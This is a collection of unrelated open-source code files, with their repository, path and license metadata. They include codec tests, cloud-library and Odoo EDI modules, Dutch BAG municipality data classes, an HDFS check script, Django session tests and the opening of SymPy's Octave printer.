self.check_decode(1252, (
(b'abc', 'strict', 'abc'),
(b'\xe9\x80', 'strict', '\xe9\u20ac'),
(b'\xff', 'strict', '\xff'),
))
def test_cp_utf7(self):
cp = 65000
self.check_encode(cp, (
('abc', 'strict', b'abc'),
('\xe9\u20ac', 'strict', b'+AOkgrA-'),
('\U0010ffff', 'strict', b'+2//f/w-'),
('\udc80', 'strict', b'+3IA-'),
('\ufffd', 'strict', b'+//0-'),
))
self.check_decode(cp, (
(b'abc', 'strict', 'abc'),
(b'+AOkgrA-', 'strict', '\xe9\u20ac'),
(b'+2//f/w-', 'strict', '\U0010ffff'),
(b'+3IA-', 'strict', '\udc80'),
(b'+//0-', 'strict', '\ufffd'),
# invalid bytes
(b'[+/]', 'strict', '[]'),
(b'[\xff]', 'strict', '[\xff]'),
))
def test_multibyte_encoding(self):
self.check_decode(932, (
(b'\x84\xe9\x80', 'ignore', '\u9a3e'),
(b'\x84\xe9\x80', 'replace', '\ufffd\u9a3e'),
))
self.check_decode(self.CP_UTF8, (
(b'\xff\xf4\x8f\xbf\xbf', 'ignore', '\U0010ffff'),
(b'\xff\xf4\x8f\xbf\xbf', 'replace', '\ufffd\U0010ffff'),
))
if VISTA_OR_LATER:
self.check_encode(self.CP_UTF8, (
('[\U0010ffff\uDC80]', 'ignore', b'[\xf4\x8f\xbf\xbf]'),
('[\U0010ffff\uDC80]', 'replace', b'[\xf4\x8f\xbf\xbf?]'),
))
def test_incremental(self):
decoded = codecs.code_page_decode(932, b'\x82', 'strict', False)
self.assertEqual(decoded, ('', 0))
decoded = codecs.code_page_decode(932,
b'\xe9\x80\xe9', 'strict',
False)
self.assertEqual(decoded, ('\u9a3e', 2))
decoded = codecs.code_page_decode(932,
b'\xe9\x80\xe9\x80', 'strict',
False)
self.assertEqual(decoded, ('\u9a3e\u9a3e', 4))
decoded = codecs.code_page_decode(932,
b'abc', 'strict',
False)
self.assertEqual(decoded, ('abc', 3))
if __name__ == "__main__":
unittest.main()
| lgpl-3.0 |
MrBasset/libcloud | libcloud/test/common/test_gandi.py | 66 | 1293 | # Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from libcloud.utils.py3 import xmlrpclib
from libcloud.test import MockHttp
class BaseGandiMockHttp(MockHttp):
def _get_method_name(self, type, use_param, qs, path):
return "_xmlrpc"
def _xmlrpc(self, method, url, body, headers):
params, methodName = xmlrpclib.loads(body)
meth_name = '_xmlrpc__' + methodName.replace('.', '_')
if self.type:
meth_name = '%s_%s' % (meth_name, self.type)
return getattr(self, meth_name)(method, url, body, headers)
| apache-2.0 |
sebastic/NLExtract | bag/src/bestuurlijkobject.py | 2 | 5596 | __author__ = "Just van den Broecke"
__date__ = "Dec 25, 2011 3:46:27 PM$"
"""
Naam: BestuurlijkObject.py
Omschrijving: Classes voor Bestuurlijke objecten
De BAG bevat geen bestuurlijke objecten, zoals gemeenten en provincies.
Daarom verrijken we de BAG met additionele bestuurlijke data. Deze is te verkrijegn via Kadaster
en CBS.
De BestuurlijkObject classes zijn afgeleid van de basisclass BestuurlijkObject.
Auteur: Just van den Broecke (Milo van der Linden origineel)
Versie: 1.0
- basis versie
Datum: 25 december 2011
OpenGeoGroep.nl
"""
import datetime
import time
def getDate(node):
"""
Maak een datum object van een XML datum/tijd
BAG Datum/tijd is in het formaat JJJJMMDDUUMMSSmm
Deze functie genereert een datum van de BAG:DatumTijd
"""
if type(node) == str:
# Momenteel alleen voor de gemeente_woonplaats csv
_text = node
if len(_text) > 0:
if len(_text) == 10:
return datetime.datetime(*time.strptime(_text, "%d-%m-%Y")[0:6])
elif len(_text) == 8:
return datetime.datetime(*time.strptime(_text, "%Y%m%d")[0:6])
else:
return None
def getNumber(node):
"""
Maak een nummer of None uit node
"""
if type(node) == str:
# Momenteel alleen voor de gemeente_woonplaats csv
if len(node) != 0:
return node
return None
class BestuurlijkObject:
def __init__(self):
self.id = None
class GemeenteWoonplaats(BestuurlijkObject):
"""
Klasse Gemeente
"""
def __init__(self,record):
# TODO: De csv is niet volledig gevuld, controleer of een record wel het minimaal aantal objecten bevat.
# Woonplaats;Woonplaats code;Ingangsdatum WPL;Einddatum WPL;Gemeente;Gemeente code;
# Ingangsdatum nieuwe gemeente;Aansluitdatum;Bijzonderheden;Nieuwe code Gemeente;
# Gemeente beeindigd per;Behandeld; Laatste WPL code:;3513
# Per 24 jan 2012 is de CSV header geworden:
# Woonplaats;Woonplaats code;Ingangsdatum WPL;Einddatum WPL
# ;Gemeente;Gemeente code;Ingangsdatum nieuwe gemeente;Gemeente beeindigd per
# (8 kolommen)
# Dirty! Dit kan vast makkelijker, mijn python tekortkoming blijkt hier ;-)
emptylist = [None,None,None,None,None,None,None,None]
record.extend(emptylist)
# Stel de lengte van het record object in op 12
if record[0]:
#print record
self.tag = "gem_LVC:GemeenteWoonplaats"
self.naam = "gemeente_woonplaats"
self.type = 'G_W'
self.woonplaatsnaam = record[0]
self.woonplaatscode = getNumber(record[1])
self.begindatum_woonplaats = getDate(record[2])
self.einddatum_woonplaats = getDate(record[3])
self.gemeentenaam = record[4]
self.gemeentecode = getNumber(record[5])
self.begindatum_gemeente = getDate(record[6])
self.einddatum_gemeente = getDate(record[7])
# self.aansluitdatum_gemeente = getDate(record[7])
# self.bijzonderheden = record[8]
# self.gemeentecode_nieuw = getNumber(record[9])
# self.behandeld = record[11]
def __repr__(self):
return "<GemeenteWoonplaats('%s','%s', '%s')>" % (self.naam, self.gemeentecode, self.woonplaatscode)
def insert(self):
self.sql = """INSERT INTO gemeente_woonplaats (
woonplaatsnaam,
woonplaatscode,
begindatum_woonplaats,
einddatum_woonplaats,
gemeentenaam,
gemeentecode,
begindatum_gemeente,
einddatum_gemeente)
VALUES (%s, %s, %s, %s, %s, %s, %s, %s)"""
self.valuelist = (self.woonplaatsnaam, self.woonplaatscode, self.begindatum_woonplaats,
self.einddatum_woonplaats,self.gemeentenaam, self.gemeentecode, self.begindatum_gemeente,
self.einddatum_gemeente)
class GemeenteProvincie(BestuurlijkObject):
"""
Verrijking: GemeenteProvincie
"""
def __init__(self,record):
# CSV schema:
# Gemcode;Gemcodel;provcode;provcodel
# 0003;Appingedam;20;Groningen
#
# alle records zijn gevuld, geen lege velden
# In 2012: 415 gemeenten
#
# DB schema:
# gemeentecode character varying(4),
# gemeentenaam character varying(80),
# provinciecode character varying(4),
# provincienaam character varying(80),
#
self.naam = 'gemeente_provincie'
self.gemeentecode = getNumber(record[0])
self.gemeentenaam = record[1]
self.provinciecode = getNumber(record[2])
self.provincienaam = record[3]
def __repr__(self):
return "<GemeenteProvincie('%s','%s', '%s')>" % (self.naam, self.gemeentenaam, self.provincienaam)
def insert(self):
self.sql = """INSERT INTO gemeente_provincie (
gemeentecode,
gemeentenaam,
provinciecode,
provincienaam)
VALUES (%s, %s, %s, %s)"""
self.valuelist = (self.gemeentecode, self.gemeentenaam, self.provinciecode,self.provincienaam)
# Creeer een BestuurlijkObject uit een CSV header+record
def BestuurlijkObjectFabriek(cols, record):
bestuurlijkOBject = None
if cols[0] == 'Woonplaats':
bestuurlijkOBject = GemeenteWoonplaats(record)
elif cols[1] == 'Gemcodel':
bestuurlijkOBject = GemeenteProvincie(record)
return bestuurlijkOBject
| gpl-3.0 |
hbrunn/OpenUpgrade | addons/edi/models/res_partner.py | 437 | 4243 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Business Applications
# Copyright (c) 2011-2012 OpenERP S.A. <http://openerp.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import logging
from openerp.osv import osv
from edi import EDIMixin
from openerp import SUPERUSER_ID
_logger = logging.getLogger(__name__)
RES_PARTNER_EDI_STRUCT = {
'name': True,
'ref': True,
'lang': True,
'website': True,
'email': True,
'street': True,
'street2': True,
'zip': True,
'city': True,
'country_id': True,
'state_id': True,
'phone': True,
'fax': True,
'mobile': True,
}
class res_partner(osv.osv, EDIMixin):
_inherit = "res.partner"
def edi_export(self, cr, uid, records, edi_struct=None, context=None):
return super(res_partner,self).edi_export(cr, uid, records,
edi_struct or dict(RES_PARTNER_EDI_STRUCT),
context=context)
def _get_bank_type(self, cr, uid, context=None):
# first option: the "normal" bank type, installed by default
res_partner_bank_type = self.pool.get('res.partner.bank.type')
try:
return self.pool.get('ir.model.data').get_object(cr, uid, 'base', 'bank_normal', context=context).code
except ValueError:
pass
# second option: create a new custom type for EDI or use it if already created, as IBAN type is
# not always appropriate: we need a free-form bank type for max flexibility (users can correct
# data manually after import)
code, label = 'edi_generic', 'Generic Bank Type (auto-created for EDI)'
bank_code_ids = res_partner_bank_type.search(cr, uid, [('code','=',code)], context=context)
if not bank_code_ids:
_logger.info('Normal bank account type is missing, creating '
'a generic bank account type for EDI.')
self.res_partner_bank_type.create(cr, SUPERUSER_ID, {'name': label,
'code': label})
return code
def edi_import(self, cr, uid, edi_document, context=None):
# handle bank info, if any
edi_bank_ids = edi_document.pop('bank_ids', None)
contact_id = super(res_partner,self).edi_import(cr, uid, edi_document, context=context)
if edi_bank_ids:
contact = self.browse(cr, uid, contact_id, context=context)
import_ctx = dict((context or {}),
default_partner_id = contact.id,
default_state=self._get_bank_type(cr, uid, context))
for ext_bank_id, bank_name in edi_bank_ids:
try:
self.edi_import_relation(cr, uid, 'res.partner.bank',
bank_name, ext_bank_id, context=import_ctx)
except osv.except_osv:
# failed to import it, try again with unrestricted default type
_logger.warning('Failed to import bank account using'
'bank type: %s, ignoring', import_ctx['default_state'],
exc_info=True)
return contact_id
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
crs4/pydoop | test/hdfs/try_hdfs.py | 2 | 1699 | # BEGIN_COPYRIGHT
#
# Copyright 2009-2021 CRS4.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy
# of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# END_COPYRIGHT
"""
Check that resetting the hdfs module after changing
os.environ['HADOOP_CONF_DIR'] works (i.e., Pydoop references the
correct HDFS service).
Note that it does **NOT** work if you've already instantiated an hdfs
handle, and this is NOT due to the caching system.
"""
from __future__ import print_function
import sys
import os
import argparse
import pydoop.hdfs as hdfs
def dump_status(fs):
print("(host, port, user) = %r" % ((fs.host, fs.port, fs.user),))
print("_CACHE = %r" % (fs._CACHE,))
print("_ALIASES = %r" % (fs._ALIASES,))
print()
def main(argv=sys.argv[1:]):
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument("--conf-dir", metavar="HADOOP_CONF_DIR")
args = parser.parse_args(argv)
if args.conf_dir:
os.environ["HADOOP_CONF_DIR"] = os.path.abspath(args.conf_dir)
hdfs.reset()
fs = hdfs.hdfs()
print("--- OPEN ---")
dump_status(fs)
print("cwd:", fs.working_directory())
print
fs.close()
print("--- CLOSED ---")
dump_status(fs)
if __name__ == "__main__":
main()
| apache-2.0 |
weiawe/django | tests/sessions_tests/tests.py | 10 | 24700 | import base64
import os
import shutil
import string
import sys
import tempfile
import unittest
from datetime import timedelta
from django.conf import settings
from django.contrib.sessions.backends.cache import SessionStore as CacheSession
from django.contrib.sessions.backends.cached_db import \
SessionStore as CacheDBSession
from django.contrib.sessions.backends.db import SessionStore as DatabaseSession
from django.contrib.sessions.backends.file import SessionStore as FileSession
from django.contrib.sessions.backends.signed_cookies import \
SessionStore as CookieSession
from django.contrib.sessions.exceptions import InvalidSessionKey
from django.contrib.sessions.middleware import SessionMiddleware
from django.contrib.sessions.models import Session
from django.contrib.sessions.serializers import (
JSONSerializer, PickleSerializer,
)
from django.core import management
from django.core.cache import caches
from django.core.cache.backends.base import InvalidCacheBackendError
from django.core.exceptions import ImproperlyConfigured
from django.http import HttpResponse
from django.test import (
RequestFactory, TestCase, ignore_warnings, override_settings,
)
from django.test.utils import patch_logger
from django.utils import six, timezone
from django.utils.encoding import force_text
from django.utils.six.moves import http_cookies
class SessionTestsMixin(object):
# This does not inherit from TestCase to avoid any tests being run with this
# class, which wouldn't work, and to allow different TestCase subclasses to
# be used.
backend = None # subclasses must specify
def setUp(self):
self.session = self.backend()
def tearDown(self):
# NB: be careful to delete any sessions created; stale sessions fill up
# the /tmp (with some backends) and eventually overwhelm it after lots
# of runs (think buildbots)
self.session.delete()
def test_new_session(self):
self.assertFalse(self.session.modified)
self.assertFalse(self.session.accessed)
def test_get_empty(self):
self.assertEqual(self.session.get('cat'), None)
def test_store(self):
self.session['cat'] = "dog"
self.assertTrue(self.session.modified)
self.assertEqual(self.session.pop('cat'), 'dog')
def test_pop(self):
self.session['some key'] = 'exists'
# Need to reset these to pretend we haven't accessed it:
self.accessed = False
self.modified = False
self.assertEqual(self.session.pop('some key'), 'exists')
self.assertTrue(self.session.accessed)
self.assertTrue(self.session.modified)
self.assertEqual(self.session.get('some key'), None)
def test_pop_default(self):
self.assertEqual(self.session.pop('some key', 'does not exist'),
'does not exist')
self.assertTrue(self.session.accessed)
self.assertFalse(self.session.modified)
def test_setdefault(self):
self.assertEqual(self.session.setdefault('foo', 'bar'), 'bar')
self.assertEqual(self.session.setdefault('foo', 'baz'), 'bar')
self.assertTrue(self.session.accessed)
self.assertTrue(self.session.modified)
def test_update(self):
self.session.update({'update key': 1})
self.assertTrue(self.session.accessed)
self.assertTrue(self.session.modified)
self.assertEqual(self.session.get('update key', None), 1)
def test_has_key(self):
self.session['some key'] = 1
self.session.modified = False
self.session.accessed = False
self.assertIn('some key', self.session)
self.assertTrue(self.session.accessed)
self.assertFalse(self.session.modified)
def test_values(self):
self.assertEqual(list(self.session.values()), [])
self.assertTrue(self.session.accessed)
self.session['some key'] = 1
self.assertEqual(list(self.session.values()), [1])
def test_iterkeys(self):
self.session['x'] = 1
self.session.modified = False
self.session.accessed = False
i = six.iterkeys(self.session)
self.assertTrue(hasattr(i, '__iter__'))
self.assertTrue(self.session.accessed)
self.assertFalse(self.session.modified)
self.assertEqual(list(i), ['x'])
def test_itervalues(self):
self.session['x'] = 1
self.session.modified = False
self.session.accessed = False
i = six.itervalues(self.session)
self.assertTrue(hasattr(i, '__iter__'))
self.assertTrue(self.session.accessed)
self.assertFalse(self.session.modified)
self.assertEqual(list(i), [1])
def test_iteritems(self):
self.session['x'] = 1
self.session.modified = False
self.session.accessed = False
i = six.iteritems(self.session)
self.assertTrue(hasattr(i, '__iter__'))
self.assertTrue(self.session.accessed)
self.assertFalse(self.session.modified)
self.assertEqual(list(i), [('x', 1)])
def test_clear(self):
self.session['x'] = 1
self.session.modified = False
self.session.accessed = False
self.assertEqual(list(self.session.items()), [('x', 1)])
self.session.clear()
self.assertEqual(list(self.session.items()), [])
self.assertTrue(self.session.accessed)
self.assertTrue(self.session.modified)
def test_save(self):
if (hasattr(self.session, '_cache') and 'DummyCache' in
settings.CACHES[settings.SESSION_CACHE_ALIAS]['BACKEND']):
raise unittest.SkipTest("Session saving tests require a real cache backend")
self.session.save()
self.assertTrue(self.session.exists(self.session.session_key))
def test_delete(self):
self.session.save()
self.session.delete(self.session.session_key)
self.assertFalse(self.session.exists(self.session.session_key))
def test_flush(self):
self.session['foo'] = 'bar'
self.session.save()
prev_key = self.session.session_key
self.session.flush()
self.assertFalse(self.session.exists(prev_key))
self.assertNotEqual(self.session.session_key, prev_key)
self.assertTrue(self.session.modified)
self.assertTrue(self.session.accessed)
def test_cycle(self):
self.session['a'], self.session['b'] = 'c', 'd'
self.session.save()
prev_key = self.session.session_key
prev_data = list(self.session.items())
self.session.cycle_key()
self.assertNotEqual(self.session.session_key, prev_key)
self.assertEqual(list(self.session.items()), prev_data)
def test_invalid_key(self):
# Submitting an invalid session key (either by guessing, or if the db has
# removed the key) results in a new key being generated.
try:
session = self.backend('1')
try:
session.save()
except AttributeError:
self.fail(
"The session object did not save properly. "
"Middleware may be saving cache items without namespaces."
)
self.assertNotEqual(session.session_key, '1')
self.assertEqual(session.get('cat'), None)
session.delete()
finally:
# Some backends leave a stale cache entry for the invalid
# session key; make sure that entry is manually deleted
session.delete('1')
def test_session_key_is_read_only(self):
def set_session_key(session):
session.session_key = session._get_new_session_key()
self.assertRaises(AttributeError, set_session_key, self.session)
# Custom session expiry
def test_default_expiry(self):
# A normal session has a max age equal to settings
self.assertEqual(self.session.get_expiry_age(), settings.SESSION_COOKIE_AGE)
# So does a custom session with an idle expiration time of 0 (but it'll
# expire at browser close)
self.session.set_expiry(0)
self.assertEqual(self.session.get_expiry_age(), settings.SESSION_COOKIE_AGE)
def test_custom_expiry_seconds(self):
modification = timezone.now()
self.session.set_expiry(10)
date = self.session.get_expiry_date(modification=modification)
self.assertEqual(date, modification + timedelta(seconds=10))
age = self.session.get_expiry_age(modification=modification)
self.assertEqual(age, 10)
def test_custom_expiry_timedelta(self):
modification = timezone.now()
# Mock timezone.now, because set_expiry calls it on this code path.
original_now = timezone.now
try:
timezone.now = lambda: modification
self.session.set_expiry(timedelta(seconds=10))
finally:
timezone.now = original_now
date = self.session.get_expiry_date(modification=modification)
self.assertEqual(date, modification + timedelta(seconds=10))
age = self.session.get_expiry_age(modification=modification)
self.assertEqual(age, 10)
def test_custom_expiry_datetime(self):
modification = timezone.now()
self.session.set_expiry(modification + timedelta(seconds=10))
date = self.session.get_expiry_date(modification=modification)
self.assertEqual(date, modification + timedelta(seconds=10))
age = self.session.get_expiry_age(modification=modification)
self.assertEqual(age, 10)
def test_custom_expiry_reset(self):
self.session.set_expiry(None)
self.session.set_expiry(10)
self.session.set_expiry(None)
self.assertEqual(self.session.get_expiry_age(), settings.SESSION_COOKIE_AGE)
def test_get_expire_at_browser_close(self):
# Tests get_expire_at_browser_close with different settings and different
# set_expiry calls
with override_settings(SESSION_EXPIRE_AT_BROWSER_CLOSE=False):
self.session.set_expiry(10)
self.assertFalse(self.session.get_expire_at_browser_close())
self.session.set_expiry(0)
self.assertTrue(self.session.get_expire_at_browser_close())
self.session.set_expiry(None)
self.assertFalse(self.session.get_expire_at_browser_close())
with override_settings(SESSION_EXPIRE_AT_BROWSER_CLOSE=True):
self.session.set_expiry(10)
self.assertFalse(self.session.get_expire_at_browser_close())
self.session.set_expiry(0)
self.assertTrue(self.session.get_expire_at_browser_close())
self.session.set_expiry(None)
self.assertTrue(self.session.get_expire_at_browser_close())
def test_decode(self):
# Ensure we can decode what we encode
data = {'a test key': 'a test value'}
encoded = self.session.encode(data)
self.assertEqual(self.session.decode(encoded), data)
def test_decode_failure_logged_to_security(self):
bad_encode = base64.b64encode(b'flaskdj:alkdjf')
with patch_logger('django.security.SuspiciousSession', 'warning') as calls:
self.assertEqual({}, self.session.decode(bad_encode))
# check that the failed decode is logged
self.assertEqual(len(calls), 1)
self.assertIn('corrupted', calls[0])
def test_actual_expiry(self):
# this doesn't work with JSONSerializer (serializing timedelta)
with override_settings(SESSION_SERIALIZER='django.contrib.sessions.serializers.PickleSerializer'):
self.session = self.backend() # reinitialize after overriding settings
# Regression test for #19200
old_session_key = None
new_session_key = None
try:
self.session['foo'] = 'bar'
self.session.set_expiry(-timedelta(seconds=10))
self.session.save()
old_session_key = self.session.session_key
# With an expiry date in the past, the session expires instantly.
new_session = self.backend(self.session.session_key)
new_session_key = new_session.session_key
self.assertNotIn('foo', new_session)
finally:
self.session.delete(old_session_key)
self.session.delete(new_session_key)
class DatabaseSessionTests(SessionTestsMixin, TestCase):
backend = DatabaseSession
def test_session_str(self):
"Session repr should be the session key."
self.session['x'] = 1
self.session.save()
session_key = self.session.session_key
s = Session.objects.get(session_key=session_key)
self.assertEqual(force_text(s), session_key)
def test_session_get_decoded(self):
"""
Test we can use Session.get_decoded to retrieve data stored
in normal way
"""
self.session['x'] = 1
self.session.save()
s = Session.objects.get(session_key=self.session.session_key)
self.assertEqual(s.get_decoded(), {'x': 1})
def test_sessionmanager_save(self):
"""
Test SessionManager.save method
"""
# Create a session
self.session['y'] = 1
self.session.save()
s = Session.objects.get(session_key=self.session.session_key)
# Change it
Session.objects.save(s.session_key, {'y': 2}, s.expire_date)
# Clear cache, so that it will be retrieved from DB
del self.session._session_cache
self.assertEqual(self.session['y'], 2)
@override_settings(SESSION_ENGINE="django.contrib.sessions.backends.db")
def test_clearsessions_command(self):
"""
Test clearsessions command for clearing expired sessions.
"""
self.assertEqual(0, Session.objects.count())
# One object in the future
self.session['foo'] = 'bar'
self.session.set_expiry(3600)
self.session.save()
# One object in the past
other_session = self.backend()
other_session['foo'] = 'bar'
other_session.set_expiry(-3600)
other_session.save()
# Two sessions are in the database before clearsessions...
self.assertEqual(2, Session.objects.count())
management.call_command('clearsessions')
# ... and one is deleted.
self.assertEqual(1, Session.objects.count())
@override_settings(USE_TZ=True)
class DatabaseSessionWithTimeZoneTests(DatabaseSessionTests):
pass
class CacheDBSessionTests(SessionTestsMixin, TestCase):
backend = CacheDBSession
@unittest.skipIf('DummyCache' in
settings.CACHES[settings.SESSION_CACHE_ALIAS]['BACKEND'],
"Session saving tests require a real cache backend")
def test_exists_searches_cache_first(self):
self.session.save()
with self.assertNumQueries(0):
self.assertTrue(self.session.exists(self.session.session_key))
# Some backends might issue a warning
@ignore_warnings(module="django.core.cache.backends.base")
def test_load_overlong_key(self):
self.session._session_key = (string.ascii_letters + string.digits) * 20
self.assertEqual(self.session.load(), {})
@override_settings(SESSION_CACHE_ALIAS='sessions')
def test_non_default_cache(self):
# 21000 - CacheDB backend should respect SESSION_CACHE_ALIAS.
self.assertRaises(InvalidCacheBackendError, self.backend)
@override_settings(USE_TZ=True)
class CacheDBSessionWithTimeZoneTests(CacheDBSessionTests):
pass
# Don't need DB flushing for these tests, so can use unittest.TestCase as base class
class FileSessionTests(SessionTestsMixin, unittest.TestCase):
backend = FileSession
def setUp(self):
# Do file session tests in an isolated directory, and kill it after we're done.
self.original_session_file_path = settings.SESSION_FILE_PATH
self.temp_session_store = settings.SESSION_FILE_PATH = tempfile.mkdtemp()
# Reset the file session backend's internal caches
if hasattr(self.backend, '_storage_path'):
del self.backend._storage_path
super(FileSessionTests, self).setUp()
def tearDown(self):
super(FileSessionTests, self).tearDown()
settings.SESSION_FILE_PATH = self.original_session_file_path
shutil.rmtree(self.temp_session_store)
@override_settings(
SESSION_FILE_PATH="/if/this/directory/exists/you/have/a/weird/computer")
def test_configuration_check(self):
del self.backend._storage_path
# Make sure the file backend checks for a good storage dir
self.assertRaises(ImproperlyConfigured, self.backend)
def test_invalid_key_backslash(self):
# Ensure we don't allow directory-traversal.
# This is tested directly on _key_to_file, as load() will swallow
# a SuspiciousOperation in the same way as an IOError - by creating
# a new session, making it unclear whether the slashes were detected.
self.assertRaises(InvalidSessionKey,
self.backend()._key_to_file, "a\\b\\c")
def test_invalid_key_forwardslash(self):
# Ensure we don't allow directory-traversal
self.assertRaises(InvalidSessionKey,
self.backend()._key_to_file, "a/b/c")
@override_settings(SESSION_ENGINE="django.contrib.sessions.backends.file")
def test_clearsessions_command(self):
"""
Test clearsessions command for clearing expired sessions.
"""
storage_path = self.backend._get_storage_path()
file_prefix = settings.SESSION_COOKIE_NAME
def count_sessions():
return len([session_file for session_file in os.listdir(storage_path)
if session_file.startswith(file_prefix)])
self.assertEqual(0, count_sessions())
# One object in the future
self.session['foo'] = 'bar'
self.session.set_expiry(3600)
self.session.save()
# One object in the past
other_session = self.backend()
other_session['foo'] = 'bar'
other_session.set_expiry(-3600)
other_session.save()
# Two sessions are in the filesystem before clearsessions...
self.assertEqual(2, count_sessions())
management.call_command('clearsessions')
# ... and one is deleted.
self.assertEqual(1, count_sessions())
class CacheSessionTests(SessionTestsMixin, unittest.TestCase):
backend = CacheSession
# Some backends might issue a warning
@ignore_warnings(module="django.core.cache.backends.base")
def test_load_overlong_key(self):
self.session._session_key = (string.ascii_letters + string.digits) * 20
self.assertEqual(self.session.load(), {})
def test_default_cache(self):
self.session.save()
self.assertNotEqual(caches['default'].get(self.session.cache_key), None)
@override_settings(CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
},
'sessions': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'session',
},
}, SESSION_CACHE_ALIAS='sessions')
def test_non_default_cache(self):
# Re-initialize the session backend to make use of overridden settings.
self.session = self.backend()
self.session.save()
self.assertEqual(caches['default'].get(self.session.cache_key), None)
self.assertNotEqual(caches['sessions'].get(self.session.cache_key), None)
class SessionMiddlewareTests(TestCase):
@override_settings(SESSION_COOKIE_SECURE=True)
def test_secure_session_cookie(self):
request = RequestFactory().get('/')
response = HttpResponse('Session test')
middleware = SessionMiddleware()
# Simulate a request the modifies the session
middleware.process_request(request)
request.session['hello'] = 'world'
# Handle the response through the middleware
response = middleware.process_response(request, response)
self.assertTrue(
response.cookies[settings.SESSION_COOKIE_NAME]['secure'])
@override_settings(SESSION_COOKIE_HTTPONLY=True)
def test_httponly_session_cookie(self):
request = RequestFactory().get('/')
response = HttpResponse('Session test')
middleware = SessionMiddleware()
# Simulate a request the modifies the session
middleware.process_request(request)
request.session['hello'] = 'world'
# Handle the response through the middleware
response = middleware.process_response(request, response)
self.assertTrue(
response.cookies[settings.SESSION_COOKIE_NAME]['httponly'])
self.assertIn(http_cookies.Morsel._reserved['httponly'],
str(response.cookies[settings.SESSION_COOKIE_NAME]))
@override_settings(SESSION_COOKIE_HTTPONLY=False)
def test_no_httponly_session_cookie(self):
request = RequestFactory().get('/')
response = HttpResponse('Session test')
middleware = SessionMiddleware()
# Simulate a request the modifies the session
middleware.process_request(request)
request.session['hello'] = 'world'
# Handle the response through the middleware
response = middleware.process_response(request, response)
self.assertFalse(response.cookies[settings.SESSION_COOKIE_NAME]['httponly'])
self.assertNotIn(http_cookies.Morsel._reserved['httponly'],
str(response.cookies[settings.SESSION_COOKIE_NAME]))
def test_session_save_on_500(self):
request = RequestFactory().get('/')
response = HttpResponse('Horrible error')
response.status_code = 500
middleware = SessionMiddleware()
# Simulate a request the modifies the session
middleware.process_request(request)
request.session['hello'] = 'world'
# Handle the response through the middleware
response = middleware.process_response(request, response)
# Check that the value wasn't saved above.
self.assertNotIn('hello', request.session.load())
def test_session_delete_on_end(self):
request = RequestFactory().get('/')
response = HttpResponse('Session test')
middleware = SessionMiddleware()
# Before deleting, there has to be an existing cookie
request.COOKIES[settings.SESSION_COOKIE_NAME] = 'abc'
# Simulate a request that ends the session
middleware.process_request(request)
request.session.flush()
# Handle the response through the middleware
response = middleware.process_response(request, response)
# Check that the cookie was deleted, not recreated.
# A deleted cookie header looks like:
# Set-Cookie: sessionid=; expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
self.assertEqual(
'Set-Cookie: {}={}; expires=Thu, 01-Jan-1970 00:00:00 GMT; '
'Max-Age=0; Path=/'.format(
settings.SESSION_COOKIE_NAME,
'""' if sys.version_info >= (3, 5) else '',
),
str(response.cookies[settings.SESSION_COOKIE_NAME])
)
# Don't need DB flushing for these tests, so can use unittest.TestCase as base class
class CookieSessionTests(SessionTestsMixin, unittest.TestCase):
backend = CookieSession
def test_save(self):
"""
This test tested exists() in the other session backends, but that
doesn't make sense for us.
"""
pass
def test_cycle(self):
"""
This test tested cycle_key() which would create a new session
key for the same session data. But we can't invalidate previously
signed cookies (other than letting them expire naturally) so
testing for this behavior is meaningless.
"""
pass
@unittest.expectedFailure
def test_actual_expiry(self):
# The cookie backend doesn't handle non-default expiry dates, see #19201
super(CookieSessionTests, self).test_actual_expiry()
def test_unpickling_exception(self):
# signed_cookies backend should handle unpickle exceptions gracefully
# by creating a new session
self.assertEqual(self.session.serializer, JSONSerializer)
self.session.save()
self.session.serializer = PickleSerializer
self.session.load()
| bsd-3-clause |
AkademieOlympia/sympy | sympy/printing/octave.py | 52 | 22542 | """
Octave (and Matlab) code printer
The `OctaveCodePrinter` converts SymPy expressions into Octave expressions.
It uses a subset of the Octave language for Matlab compatibility.
A complete code generator, which uses `octave_code` extensively, can be found
in `sympy.utilities.codegen`. The `codegen` module can be used to generate
complete source code files.
"""
from __future__ import print_function, division
from sympy.core import Mul, Pow, S, Rational
from sympy.core.compatibility import string_types, range
from sympy.core.mul import _keep_coeff
from sympy.printing.codeprinter import CodePrinter, Assignment
from sympy.printing.precedence import precedence
from re import search
# List of known functions. First, those that have the same name in
# SymPy and Octave. This is almost certainly incomplete!
known_fcns_src1 = ["sin", "cos", "tan", "asin", "acos", "atan", "atan2",
"sinh", "cosh", "tanh", "asinh", "acosh", "atanh",
"log", "exp", "erf", "gamma", "sign", "floor", "csc",
"sec", "cot", "coth", "acot", "acoth", "erfc",
"besselj", "bessely", "besseli", "besselk",
"erfinv", "erfcinv", "factorial" ]
# These functions have different names ("Sympy": "Octave"), more
